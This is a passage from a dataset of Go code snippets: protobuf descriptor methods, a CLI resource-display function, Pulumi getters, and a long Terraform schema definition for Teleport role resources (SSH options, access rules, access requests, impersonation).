[]int{6}\n}", "func (c *CLI) ShowResource(schemaID, uuid string) (string, error) {\n\tif schemaID == \"\" || uuid == \"\" {\n\t\treturn c.showHelp(schemaID, showHelpTemplate)\n\t}\n\n\tvar response map[string]interface{}\n\t_, err := c.Read(context.Background(), urlPath(schemaID, uuid), &response)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tdata, ok := response[models.SchemaIDToKind(schemaID)].(map[string]interface{})\n\tif !ok {\n\t\treturn \"\", errors.Errorf(\n\t\t\t\"resource in response is not a JSON object: %v\",\n\t\t\tresponse[models.SchemaIDToKind(schemaID)],\n\t\t)\n\t}\n\n\treturn encodeToYAML(syncListResponse{Resources: []syncResponse{{Data: data, Kind: schemaID}}})\n}", "func (*UserIDs) Descriptor() ([]byte, []int) {\n\treturn file_src_nap_nap_proto_rawDescGZIP(), []int{16}\n}", "func (Resource_Type) EnumDescriptor() ([]byte, []int) {\n\treturn file_ocis_messages_settings_v0_settings_proto_rawDescGZIP(), []int{3, 0}\n}", "func (*GetInfoByUniqueIdResponse) Descriptor() ([]byte, []int) {\n\treturn file_proto_user_user_proto_rawDescGZIP(), []int{3}\n}", "func PossibleResourceIdentityTypeValues() []ResourceIdentityType {\n return []ResourceIdentityType{SystemAssigned}\n }", "func PossibleResourceIdentityTypeValues() []ResourceIdentityType {\n return []ResourceIdentityType{SystemAssigned}\n }", "func (*AddUserOrganizationScopeResponse) Descriptor() ([]byte, []int) {\n\treturn file_buf_alpha_registry_v1alpha1_user_proto_rawDescGZIP(), []int{18}\n}", "func (*ExistingRoleRelationships_Permissions) Descriptor() ([]byte, []int) {\n\treturn file_protodef_user_user_proto_rawDescGZIP(), []int{14, 0}\n}", "func (*Replication_UserManaged) Descriptor() ([]byte, []int) {\n\treturn file_google_cloud_secrets_v1beta1_resources_proto_rawDescGZIP(), []int{2, 1}\n}", "func (*RoleResponse) Descriptor() ([]byte, []int) {\n\treturn file_proto_fandncloud_service_user_user_proto_rawDescGZIP(), []int{13}\n}", "func (*GetByIDRequest) Descriptor() ([]byte, []int) {\n\treturn file_api_users_v1_users_proto_rawDescGZIP(), []int{2}\n}", "func (*ExistingUserRelationships_Roles) Descriptor() ([]byte, []int) {\n\treturn file_protodef_user_user_proto_rawDescGZIP(), []int{6, 0}\n}", "func (*IamPolicyAnalysisQuery_IdentitySelector) Descriptor() ([]byte, []int) {\n\treturn file_google_cloud_asset_v1_asset_service_proto_rawDescGZIP(), []int{26, 1}\n}", "func (*UserIDModel) Descriptor() ([]byte, []int) {\n\treturn file_user_proto_rawDescGZIP(), []int{2}\n}", "func (o GetUsersUserOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GetUsersUser) string { return v.Id }).(pulumi.StringOutput)\n}", "func (me *CONFIGURATION_IMPL) UserId() string{\r\n return me.user-id\r\n}", "func (*Resource_ID) Descriptor() ([]byte, []int) {\n\treturn file_ocis_messages_policies_v0_policies_proto_rawDescGZIP(), []int{1, 0}\n}", "func (*AddUserServerScopeResponse) Descriptor() ([]byte, []int) {\n\treturn file_buf_alpha_registry_v1alpha1_user_proto_rawDescGZIP(), []int{26}\n}", "func GenSchemaRoleV4() map[string]*schema.Schema {\n\treturn map[string]*schema.Schema{\n\t\t// Kind is a resource kind\n\t\t\"kind\": {\n\t\t\tType: schema.TypeString,\n\t\t\tDescription: \"Kind is a resource kind\",\n\t\t\tOptional: true,\n\t\t\tDefault: \"role\",\n\t\t},\n\t\t// SubKind is an optional resource sub kind, used in some resources\n\t\t\"sub_kind\": {\n\t\t\tType: schema.TypeString,\n\t\t\tDescription: \"SubKind is an optional resource sub kind, used in some resources\",\n\t\t\tOptional: true,\n\t\t\tDefault: \"\",\n\t\t},\n\t\t// Version is version\n\t\t\"version\": {\n\t\t\tType: schema.TypeString,\n\t\t\tDescription: \"Version is version\",\n\t\t\tOptional: true,\n\t\t\tDefault: \"v4\",\n\t\t},\n\t\t// Metadata is resource metadata\n\t\t\"metadata\": {\n\t\t\tType: schema.TypeList,\n\t\t\tMaxItems: 1,\n\t\t\tDescription: \"Metadata is resource metadata\",\n\n\t\t\tOptional: true,\n\t\t\tElem: &schema.Resource{\n\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t// Name is an object name\n\t\t\t\t\t\"name\": {\n\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\tDescription: \"Name is an object name\",\n\t\t\t\t\t\tRequired: true,\n\t\t\t\t\t\tForceNew: true,\n\t\t\t\t\t},\n\t\t\t\t\t// Namespace is object namespace. The field should be called \"namespace\"\n\t\t\t\t\t// when it returns in Teleport 2.4.\n\t\t\t\t\t\"namespace\": {\n\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\tDescription: \"Namespace is object namespace. The field should be called \\\"namespace\\\" when it returns in Teleport 2.4.\",\n\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\tDefault: \"default\",\n\t\t\t\t\t},\n\t\t\t\t\t// Description is object description\n\t\t\t\t\t\"description\": {\n\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\tDescription: \"Description is object description\",\n\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t},\n\t\t\t\t\t// Labels is a set of labels\n\t\t\t\t\t\"labels\": {\n\n\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\tType: schema.TypeMap,\n\t\t\t\t\t\tDescription: \"Labels is a set of labels\",\n\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\t// Expires is a global expiry time header can be set on any resource in the\n\t\t\t\t\t// system.\n\t\t\t\t\t\"expires\": {\n\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\tDescription: \"Expires is a global expiry time header can be set on any resource in the system.\",\n\t\t\t\t\t\tValidateFunc: validation.IsRFC3339Time,\n\t\t\t\t\t\tStateFunc: TruncateMs,\n\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t\t// Spec is a role specification\n\t\t\"spec\": {\n\t\t\tType: schema.TypeList,\n\t\t\tMaxItems: 1,\n\t\t\tDescription: \"RoleSpecV4 is role specification for RoleV4.\",\n\n\t\t\tRequired: true,\n\t\t\tElem: &schema.Resource{\n\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t// Options is for OpenSSH options like agent forwarding.\n\t\t\t\t\t\"options\": {\n\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\tMaxItems: 1,\n\t\t\t\t\t\tDescription: \"RoleOptions is a set of role options\",\n\n\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t// ForwardAgent is SSH agent forwarding.\n\t\t\t\t\t\t\t\t\"forward_agent\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeBool,\n\t\t\t\t\t\t\t\t\tDescription: \"ForwardAgent is SSH agent forwarding.\",\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// MaxSessionTTL defines how long a SSH session can last for.\n\t\t\t\t\t\t\t\t\"max_session_ttl\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\tDescription: \"MaxSessionTTL defines how long a SSH session can last for.\",\n\t\t\t\t\t\t\t\t\tDiffSuppressFunc: SuppressDurationChange,\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tDefault: \"30h\",\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// PortForwarding defines if the certificate will have\n\t\t\t\t\t\t\t\t// \"permit-port-forwarding\"\n\t\t\t\t\t\t\t\t// in the certificate. PortForwarding is \"yes\" if not set,\n\t\t\t\t\t\t\t\t// that's why this is a pointer\n\t\t\t\t\t\t\t\t\"port_forwarding\": SchemaBoolOption(),\n\t\t\t\t\t\t\t\t// CertificateFormat defines the format of the user certificate to allow\n\t\t\t\t\t\t\t\t// compatibility with older versions of OpenSSH.\n\t\t\t\t\t\t\t\t\"certificate_format\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\tDescription: \"CertificateFormat defines the format of the user certificate to allow compatibility with older versions of OpenSSH.\",\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tDefault: \"standard\",\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// ClientIdleTimeout sets disconnect clients on idle timeout behavior,\n\t\t\t\t\t\t\t\t// if set to 0 means do not disconnect, otherwise is set to the idle\n\t\t\t\t\t\t\t\t// duration.\n\t\t\t\t\t\t\t\t\"client_idle_timeout\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\tDescription: \"ClientIdleTimeout sets disconnect clients on idle timeout behavior, if set to 0 means do not disconnect, otherwise is set to the idle duration.\",\n\t\t\t\t\t\t\t\t\tDiffSuppressFunc: SuppressDurationChange,\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// DisconnectExpiredCert sets disconnect clients on expired certificates.\n\t\t\t\t\t\t\t\t\"disconnect_expired_cert\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeBool,\n\t\t\t\t\t\t\t\t\tDescription: \"DisconnectExpiredCert sets disconnect clients on expired certificates.\",\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// BPF defines what events to record for the BPF-based session recorder.\n\t\t\t\t\t\t\t\t\"bpf\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"BPF defines what events to record for the BPF-based session recorder.\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// PermitX11Forwarding authorizes use of X11 forwarding.\n\t\t\t\t\t\t\t\t\"permit_x11forwarding\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeBool,\n\t\t\t\t\t\t\t\t\tDescription: \"PermitX11Forwarding authorizes use of X11 forwarding.\",\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// MaxConnections defines the maximum number of\n\t\t\t\t\t\t\t\t// concurrent connections a user may hold.\n\t\t\t\t\t\t\t\t\"max_connections\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeInt,\n\t\t\t\t\t\t\t\t\tDescription: \"MaxConnections defines the maximum number of concurrent connections a user may hold.\",\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// MaxSessions defines the maximum number of\n\t\t\t\t\t\t\t\t// concurrent sessions per connection.\n\t\t\t\t\t\t\t\t\"max_sessions\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeInt,\n\t\t\t\t\t\t\t\t\tDescription: \"MaxSessions defines the maximum number of concurrent sessions per connection.\",\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// RequestAccess defines the access request stategy (optional|note|always)\n\t\t\t\t\t\t\t\t// where optional is the default.\n\t\t\t\t\t\t\t\t\"request_access\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\tDescription: \"RequestAccess defines the access request stategy (optional|note|always) where optional is the default.\",\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// RequestPrompt is an optional message which tells users what they aught to\n\t\t\t\t\t\t\t\t\"request_prompt\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\tDescription: \"RequestPrompt is an optional message which tells users what they aught to\",\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// RequireSessionMFA specifies whether a user is required to do an MFA\n\t\t\t\t\t\t\t\t// check for every session.\n\t\t\t\t\t\t\t\t\"require_session_mfa\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeBool,\n\t\t\t\t\t\t\t\t\tDescription: \"RequireSessionMFA specifies whether a user is required to do an MFA check for every session.\",\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\t// Allow is the set of conditions evaluated to grant access.\n\t\t\t\t\t\"allow\": {\n\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\tMaxItems: 1,\n\t\t\t\t\t\tDescription: \"RoleConditions is a set of conditions that must all match to be allowed or denied access.\",\n\n\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t// Logins is a list of *nix system logins.\n\t\t\t\t\t\t\t\t\"logins\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"Logins is a list of *nix system logins.\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// NodeLabels is a map of node labels (used to dynamically grant access to\n\t\t\t\t\t\t\t\t// nodes).\n\t\t\t\t\t\t\t\t\"node_labels\": SchemaLabels(),\n\t\t\t\t\t\t\t\t// Rules is a list of rules and their access levels. Rules are a high level\n\t\t\t\t\t\t\t\t// construct used for access control.\n\t\t\t\t\t\t\t\t\"rules\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"Rules is a list of rules and their access levels. Rules are a high level construct used for access control.\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t// Resources is a list of resources\n\t\t\t\t\t\t\t\t\t\t\t\"resources\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Resources is a list of resources\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Verbs is a list of verbs\n\t\t\t\t\t\t\t\t\t\t\t\"verbs\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Verbs is a list of verbs\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Where specifies optional advanced matcher\n\t\t\t\t\t\t\t\t\t\t\t\"where\": {\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Where specifies optional advanced matcher\",\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Actions specifies optional actions taken when this rule matches\n\t\t\t\t\t\t\t\t\t\t\t\"actions\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Actions specifies optional actions taken when this rule matches\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// KubeGroups is a list of kubernetes groups\n\t\t\t\t\t\t\t\t\"kube_groups\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"KubeGroups is a list of kubernetes groups\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\n\t\t\t\t\t\t\t\t\"request\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tMaxItems: 1,\n\t\t\t\t\t\t\t\t\tDescription: \"AccessRequestConditions is a matcher for allow/deny restrictions on access-requests.\",\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t// Roles is the name of roles which will match the request rule.\n\t\t\t\t\t\t\t\t\t\t\t\"roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Roles is the name of roles which will match the request rule.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// ClaimsToRoles specifies a mapping from claims (traits) to teleport roles.\n\t\t\t\t\t\t\t\t\t\t\t\"claims_to_roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"ClaimsToRoles specifies a mapping from claims (traits) to teleport roles.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Claim is a claim name.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"claim\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Claim is a claim name.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Value is a claim value to match.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"value\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Value is a claim value to match.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Roles is a list of static teleport roles to match.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"roles\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Roles is a list of static teleport roles to match.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Annotations is a collection of annotations to be programmatically\n\t\t\t\t\t\t\t\t\t\t\t// appended to pending access requests at the time of their creation.\n\t\t\t\t\t\t\t\t\t\t\t// These annotations serve as a mechanism to propagate extra information\n\t\t\t\t\t\t\t\t\t\t\t// to plugins. Since these annotations support variable interpolation\n\t\t\t\t\t\t\t\t\t\t\t// syntax, they also offer a mechanism for forwarding claims from an\n\t\t\t\t\t\t\t\t\t\t\t// external identity provider, to a plugin via `{{external.trait_name}}`\n\t\t\t\t\t\t\t\t\t\t\t// style substitutions.\n\t\t\t\t\t\t\t\t\t\t\t\"annotations\": SchemaTraits(),\n\t\t\t\t\t\t\t\t\t\t\t// Thresholds is a list of thresholds, one of which must be met in order for reviews\n\t\t\t\t\t\t\t\t\t\t\t// to trigger a state-transition. If no thresholds are provided, a default threshold\n\t\t\t\t\t\t\t\t\t\t\t// of 1 for approval and denial is used.\n\t\t\t\t\t\t\t\t\t\t\t\"thresholds\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Thresholds is a list of thresholds, one of which must be met in order for reviews to trigger a state-transition. If no thresholds are provided, a default threshold of 1 for approval and denial is used.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Name is the optional human-readable name of the threshold.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"name\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Name is the optional human-readable name of the threshold.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Filter is an optional predicate used to determine which reviews\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// count toward this threshold.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"filter\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Filter is an optional predicate used to determine which reviews count toward this threshold.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Approve is the number of matching approvals needed for state-transition.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"approve\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeInt,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Approve is the number of matching approvals needed for state-transition.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t// Deny is the number of denials needed for state-transition.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"deny\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeInt,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Deny is the number of denials needed for state-transition.\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// SuggestedReviewers is a list of reviewer suggestions. These can be teleport usernames, but\n\t\t\t\t\t\t\t\t\t\t\t// that is not a requirement.\n\t\t\t\t\t\t\t\t\t\t\t\"suggested_reviewers\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"SuggestedReviewers is a list of reviewer suggestions. These can be teleport usernames, but that is not a requirement.\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// KubeUsers is an optional kubernetes users to impersonate\n\t\t\t\t\t\t\t\t\"kube_users\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"KubeUsers is an optional kubernetes users to impersonate\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// AppLabels is a map of labels used as part of the RBAC system.\n\t\t\t\t\t\t\t\t\"app_labels\": SchemaLabels(),\n\t\t\t\t\t\t\t\t// ClusterLabels is a map of node labels (used to dynamically grant access to\n\t\t\t\t\t\t\t\t// clusters).\n\t\t\t\t\t\t\t\t\"cluster_labels\": SchemaLabels(),\n\t\t\t\t\t\t\t\t// KubernetesLabels is a map of kubernetes cluster labels used for RBAC.\n\t\t\t\t\t\t\t\t\"kubernetes_labels\": SchemaLabels(),\n\t\t\t\t\t\t\t\t// DatabaseLabels are used in RBAC system to allow/deny access to databases.\n\t\t\t\t\t\t\t\t\"database_labels\": SchemaLabels(),\n\t\t\t\t\t\t\t\t// DatabaseNames is a list of database names this role is allowed to connect to.\n\t\t\t\t\t\t\t\t\"database_names\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"DatabaseNames is a list of database names this role is allowed to connect to.\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// DatabaseUsers is a list of databaes users this role is allowed to connect as.\n\t\t\t\t\t\t\t\t\"database_users\": {\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tDescription: \"DatabaseUsers is a list of databaes users this role is allowed to connect as.\",\n\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t// Impersonate specifies what users and roles this role is allowed to impersonate\n\t\t\t\t\t\t\t\t// by issuing certificates or other possible means.\n\t\t\t\t\t\t\t\t\"impersonate\": {\n\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\tMaxItems: 1,\n\t\t\t\t\t\t\t\t\tDescription: \"ImpersonateConditions specifies whether users are allowed to issue certificates for other users or groups.\",\n\n\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\tElem: &schema.Resource{\n\t\t\t\t\t\t\t\t\t\tSchema: map[string]*schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t// Users is a list of resources this role is allowed to impersonate,\n\t\t\t\t\t\t\t\t\t\t\t// could be an empty list or a Wildcard pattern\n\t\t\t\t\t\t\t\t\t\t\t\"users\": {\n\n\t\t\t\t\t\t\t\t\t\t\t\tOptional: true,\n\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeList,\n\t\t\t\t\t\t\t\t\t\t\t\tDescription: \"Users is a list of resources this role is allowed to impersonate, could be an empty list or a Wildcard pattern\",\n\t\t\t\t\t\t\t\t\t\t\t\tElem: &schema.Schema{\n\t\t\t\t\t\t\t\t\t\t\t\t\tType: schema.TypeString,\n\t\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t\t// Roles is a list of resources this role is allowed to impersonate\n\t\t\t\t\t\t\t\t\t\t\t\"roles\": 